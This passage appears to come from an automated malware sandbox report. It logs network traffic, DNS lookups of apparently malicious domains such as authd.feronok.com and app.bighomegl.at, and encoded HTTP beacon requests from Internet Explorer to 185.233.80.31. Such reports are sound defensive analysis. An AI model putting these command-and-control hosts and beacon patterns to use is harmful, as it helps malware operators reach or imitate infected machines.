                                                                                                                                                                Jun 11, 2021 05:06:41.442439079 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.442501068 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.442519903 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.442560911 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.442603111 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.442616940 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.442641973 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.442667007 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.442683935 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.442723036 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.442791939 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.442791939 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.442878962 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.442883968 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.442923069 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.442959070 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.442965031 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.443017960 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.443028927 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.443063021 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.443095922 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.443150043 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.443198919 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.443219900 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.443248034 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.443273067 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.443291903 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.443334103 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.443377972 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.631244898 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.631314993 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.631354094 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.631359100 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.631395102 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.631400108 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.631407022 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.631441116 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.631458044 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.631479979 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.631499052 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.631520033 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.631536961 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.631562948 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.631576061 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.631602049 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.631617069 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.631650925 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.631659031 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.631695986 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.631702900 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.631735086 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.631756067 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.631773949 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.631791115 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.631814003 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.631848097 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.631850958 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.631866932 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.631892920 CEST4434971450.87.220.158192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:41.631906986 CEST49714443192.168.2.350.87.220.158
                                                                                                                                                                Jun 11, 2021 05:06:41.631932974 CEST4434971450.87.220.158192.168.2.3

                                                                                                                                                                UDP Packets

                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Jun 11, 2021 05:06:25.862030029 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:25.915081024 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:28.255824089 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:28.305999041 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:29.182934999 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:29.233422041 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:30.482783079 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:30.541830063 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:34.067416906 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:34.120815992 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:36.434911013 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:36.485276937 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:37.407885075 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:37.499209881 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:37.981336117 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:38.058485031 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:39.002623081 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:39.084441900 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:39.988941908 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:40.042346954 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:40.064790010 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:40.128721952 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:40.380889893 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:40.458628893 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:40.907951117 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:40.959018946 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.065156937 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:42.129344940 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:42.249439955 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:42.300431967 CEST53530238.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:43.403639078 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:43.464952946 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:44.416743994 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:44.468770027 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:45.750783920 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:45.801269054 CEST53593498.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:46.164518118 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:46.226581097 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:49.635577917 CEST5708453192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:49.688374996 CEST53570848.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:50.769392967 CEST5882353192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:50.819897890 CEST53588238.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:51.997167110 CEST5756853192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:52.047645092 CEST53575688.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:53.898849010 CEST5054053192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:53.960830927 CEST53505408.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:06:55.046935081 CEST5436653192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:06:55.097850084 CEST53543668.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:03.387378931 CEST5303453192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:03.465854883 CEST53530348.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:18.991520882 CEST5776253192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:19.060156107 CEST53577628.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:20.711811066 CEST5543553192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:20.772805929 CEST53554358.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:33.445947886 CEST5071353192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:33.507005930 CEST53507138.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:34.860609055 CEST5613253192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:35.167087078 CEST53561328.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:38.480021000 CEST5898753192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:38.557385921 CEST53589878.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:55.667896986 CEST5657953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:55.739806890 CEST53565798.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:07:56.073646069 CEST6063353192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:07:56.135864973 CEST53606338.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:02.938903093 CEST6129253192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:02.999589920 CEST53612928.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:03.457042933 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:03.510123968 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:04.462721109 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:04.516174078 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:05.510835886 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:05.565514088 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:07.556732893 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:07.610285997 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:11.559844017 CEST6361953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:11.613286018 CEST53636198.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:17.462878942 CEST6493853192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:17.533377886 CEST53649388.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:18.654154062 CEST6194653192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:18.715344906 CEST53619468.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:31.837861061 CEST6491053192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:31.902117014 CEST53649108.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:33.055109024 CEST5212353192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:33.117408037 CEST53521238.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:40.841224909 CEST5613053192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:40.902344942 CEST53561308.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:08:41.880603075 CEST5633853192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:08:42.207499027 CEST53563388.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:04.297646046 CEST5942053192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:04.359671116 CEST53594208.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:05.394586086 CEST5878453192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:05.453524113 CEST53587848.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:22.840785027 CEST6397853192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:22.902755976 CEST53639788.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:23.724342108 CEST6293853192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:23.783349037 CEST53629388.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:24.407283068 CEST5570853192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:24.468305111 CEST53557088.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:25.002146959 CEST5680353192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:25.064754963 CEST53568038.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:25.857040882 CEST5714553192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:25.918283939 CEST53571458.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:26.525887966 CEST5535953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:26.584979057 CEST53553598.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:27.241287947 CEST5830653192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:27.302783012 CEST53583068.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:27.481347084 CEST6412453192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:27.540366888 CEST53641248.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:28.488085032 CEST4936153192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:28.547096014 CEST53493618.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:30.059524059 CEST6315053192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:30.118799925 CEST53631508.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:30.536664963 CEST5327953192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:30.589927912 CEST53532798.8.8.8192.168.2.3
                                                                                                                                                                Jun 11, 2021 05:09:48.266587973 CEST5688153192.168.2.38.8.8.8
                                                                                                                                                                Jun 11, 2021 05:09:48.331005096 CEST53568818.8.8.8192.168.2.3

                                                                                                                                                                DNS Queries

                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                                Jun 11, 2021 05:06:40.380889893 CEST192.168.2.38.8.8.80xe084Standard query (0)quickbooks.aeymotors.comA (IP address)IN (0x0001)
                                                                                                                                                                Jun 11, 2021 05:07:34.860609055 CEST192.168.2.38.8.8.80x1580Standard query (0)authd.feronok.comA (IP address)IN (0x0001)
                                                                                                                                                                Jun 11, 2021 05:08:18.654154062 CEST192.168.2.38.8.8.80xd547Standard query (0)authd.feronok.comA (IP address)IN (0x0001)
                                                                                                                                                                Jun 11, 2021 05:08:41.880603075 CEST192.168.2.38.8.8.80xd78bStandard query (0)app.bighomegl.atA (IP address)IN (0x0001)
                                                                                                                                                                Jun 11, 2021 05:09:05.394586086 CEST192.168.2.38.8.8.80xdfd3Standard query (0)authd.feronok.comA (IP address)IN (0x0001)
                                                                                                                                                                Jun 11, 2021 05:09:27.481347084 CEST192.168.2.38.8.8.80xe8d0Standard query (0)app.bighomegl.atA (IP address)IN (0x0001)
                                                                                                                                                                Jun 11, 2021 05:09:48.266587973 CEST192.168.2.38.8.8.80xb1cdStandard query (0)authd.feronok.comA (IP address)IN (0x0001)

                                                                                                                                                                DNS Answers

                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                Jun 11, 2021 05:06:40.458628893 CEST8.8.8.8192.168.2.30xe084No error (0)quickbooks.aeymotors.com50.87.220.158A (IP address)IN (0x0001)
                                                                                                                                                                Jun 11, 2021 05:07:35.167087078 CEST8.8.8.8192.168.2.30x1580No error (0)authd.feronok.com185.233.80.31A (IP address)IN (0x0001)
                                                                                                                                                                Jun 11, 2021 05:07:55.739806890 CEST8.8.8.8192.168.2.30xba06No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                Jun 11, 2021 05:08:18.715344906 CEST8.8.8.8192.168.2.30xd547No error (0)authd.feronok.com185.233.80.31A (IP address)IN (0x0001)
                                                                                                                                                                Jun 11, 2021 05:08:42.207499027 CEST8.8.8.8192.168.2.30xd78bNo error (0)app.bighomegl.at185.233.80.31A (IP address)IN (0x0001)
                                                                                                                                                                Jun 11, 2021 05:09:05.453524113 CEST8.8.8.8192.168.2.30xdfd3No error (0)authd.feronok.com185.233.80.31A (IP address)IN (0x0001)
                                                                                                                                                                Jun 11, 2021 05:09:27.540366888 CEST8.8.8.8192.168.2.30xe8d0No error (0)app.bighomegl.at185.233.80.31A (IP address)IN (0x0001)
                                                                                                                                                                Jun 11, 2021 05:09:48.331005096 CEST8.8.8.8192.168.2.30xb1cdNo error (0)authd.feronok.com185.233.80.31A (IP address)IN (0x0001)

                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                • authd.feronok.com
                                                                                                                                                                • app.bighomegl.at

                                                                                                                                                                HTTP Packets

                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                0192.168.2.349732185.233.80.3180C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Jun 11, 2021 05:07:35.230685949 CEST2298OUTGET /j0D4WkqJA4qbSI2s/tbqllkJ5QjS02c9/Y4oADFKhbig2E3MZ8L/S5BHZDPll/SOOSmvbSSzszfQOGO_2F/ebssg7ZOH9iTiK1egYa/TYvtl48FqSo7aXNnyk8zDn/0M4_2F1RU9EXO/TpeNu_2B/RPWPT_2BSfoiOaYRvUkNxcz/WR4a1P2fCQ/k1EnQMOdYbM0XsiH2/reukwmEF53hW/xa5HBUgFOAx/sGDiJ22uuBIopz/tZj9wmd1r7z3ANuAYbfIk/bhnJIJVnJvAXbS6_/2Fsif8yHgRIg6fa/a0BPP1Z_2FHpWsn1gk/fe5cFcowW/IKK9U HTTP/1.1
                                                                                                                                                                Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                Accept-Language: en-US
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                Host: authd.feronok.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Jun 11, 2021 05:07:35.765377045 CEST2298INHTTP/1.1 404 Not Found
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Fri, 11 Jun 2021 03:07:35 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                1192.168.2.349742185.233.80.3180C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Jun 11, 2021 05:08:18.773828030 CEST5430OUTGET /c0Zjvpk_/2BhHkEQKFoUb3aKx_2FuhQ9/zz1UpsMDGJ/MqFrowSgYmc2fzVA2/yf5xhKlVBQKb/rwrgpqZOvNV/mxBLQ1oxc7jv8k/5tQFefyNUnYTHJj33dQKu/YqZyqYfZuaOHFPro/3D3_2B6kK9arKKX/Wf1dZBj8QqS_2BWWVF/B7Ahpx3M5/Q3B93_2FcSTrCmxypMPT/8JVp8AUZzhfuucVY_2B/wCiIRjjYq_2FqoNLK9B6bf/0aSehXg9FwafT/cgt8pMOQ/HbDCojQOV1FVprYRnxx13U1/UwN8_2B_2F/vzILJE71SBej4gvGi/FIWIlMn9n/L3 HTTP/1.1
                                                                                                                                                                Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                Accept-Language: en-US
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                Host: authd.feronok.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Jun 11, 2021 05:08:19.317267895 CEST5430INHTTP/1.1 404 Not Found
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Fri, 11 Jun 2021 03:08:19 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                2192.168.2.349746185.233.80.3180C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Jun 11, 2021 05:08:42.281996965 CEST5468OUTGET /8N_2FW41xDzjkhrWQ/7Li83vNh8E0s/iNweknKPsr4/wqFKfz34i2ath6/I0bXROB0tUnNMBxp8qE25/AmJwK10jn6MVat3G/t7FuQx2zVw1ffa5/c7cpkHpQnz9kmDbUqx/Otf3v0Da9/dQZioOeK9Dz9hNXsqwu1/tlEzuHEM4S9kJrg9zGq/RjBYXn9MjpOQGxui0wmfPX/po6OMlacqL3xm/d_2FBFj8/AujuAR6DuH05PJMkT_2BTvZ/D_2BlXEdZ3/ZBW_2FuilrCeiWMje/rHsDq9syNU01/kSBqmc5Fyr_/2B3baeMNkKHxqo/p7TsHB_2FsB3Yjr2vV_2F/OiBfbqWQAEP/P_2F HTTP/1.1
                                                                                                                                                                Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                Accept-Language: en-US
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                Host: app.bighomegl.at
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Jun 11, 2021 05:08:42.816906929 CEST5468INHTTP/1.1 404 Not Found
                                                                                                                                                                Server: nginx
                                                                                                                                                                Date: Fri, 11 Jun 2021 03:08:42 GMT
                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: close
                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                3192.168.2.349749185.233.80.3180C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                Jun 11, 2021 05:09:05.515579939 CEST5470OUTGET /Nqnk1j8Pq1gJEs1x5F/Dd1hhfQAv/jtmHiVvgoBkcYEwLzLyA/C5p24Ce9YgRZRzxsjjD/nxl_2BdpzYbVr0QWXmBP9v/GO1k2SCoSQjXR/yxhwTnmC/pDIJ9c_2Bm_2FrJ_2B9wee3/JVSl6ysora/rGjwo8YPYfbP9mT94/HzBvhbCiqM7B/Bi1eHCPiGVL/46J0oLxANcfziq/thqSh_2Bozif3G_2Fo_2F/k6b3HZTG7RK0p_2F/ovJUD_2BB3IEisf/V1SwB6D9ZycfRmjdXo/1wtqe3ptL/omd3M4svRRs8_2F1Zp8h/fMxrdwrQxKRQQ81i3US/ttoCJ HTTP/1.1
                                                                                                                                                                Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                Accept-Language: en-US
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                Host: authd.feronok.com
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Jun 11, 2021 05:09:06.066171885 CEST5471INHTTP/1.1 404 Not Found
